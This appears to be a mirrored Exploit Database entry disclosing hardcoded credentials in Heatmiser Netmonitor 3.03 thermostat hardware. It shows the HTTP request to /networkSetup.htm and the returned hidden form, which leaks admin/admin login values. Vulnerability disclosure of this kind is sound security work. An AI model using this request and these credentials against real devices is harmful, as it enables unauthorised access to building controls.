Heatmiser Netmonitor 3.03 – Hardcoded Credentials

• Exploit Database
• 118 阅读

• 作者： Ismail Tasdelen
  日期： 2019-12-30
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47823/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  # Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials # Date: 2019-12-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.heatmiser.com/en/ # Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf # Software: Netmonitor v3.03 # Product Version: Netmonitor v3.03 # CWE : CWE-798 # Vulenrability: Use of Hard-coded Credentials # CVE: N/A   # Decription : # Hard-coded Credentials security vulnerability of Netmonitor model v3.03 # from Heatmiser manufacturer has been discovered. With this # vulnerability, the hidFrm form in the source code of the page # anonymously has access to hidden input codes. This information is # contained in the input field of the hidFrm form in the source code # lognm and logpd.     HTTP GET Request : /networkSetup.htm HTTP/1.1   <form name="hidFrm" method="post"> <input type="hidden" name="lognm" value="admin"> <input type="hidden" name="logpd" value="admin"> <input type="hidden" name="ip" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="mask" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="gate" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="dns" value="XXX.XXX.XXX.XXX"> <input type="hidden" name="timestr" value="04:27"> <input type="hidden" name="datestr" value="23/12/2019"> <input type="hidden" name="timeflag" ,="" value="0"> <input type="hidden" name="gmtflag" ,="" value="1"> </form>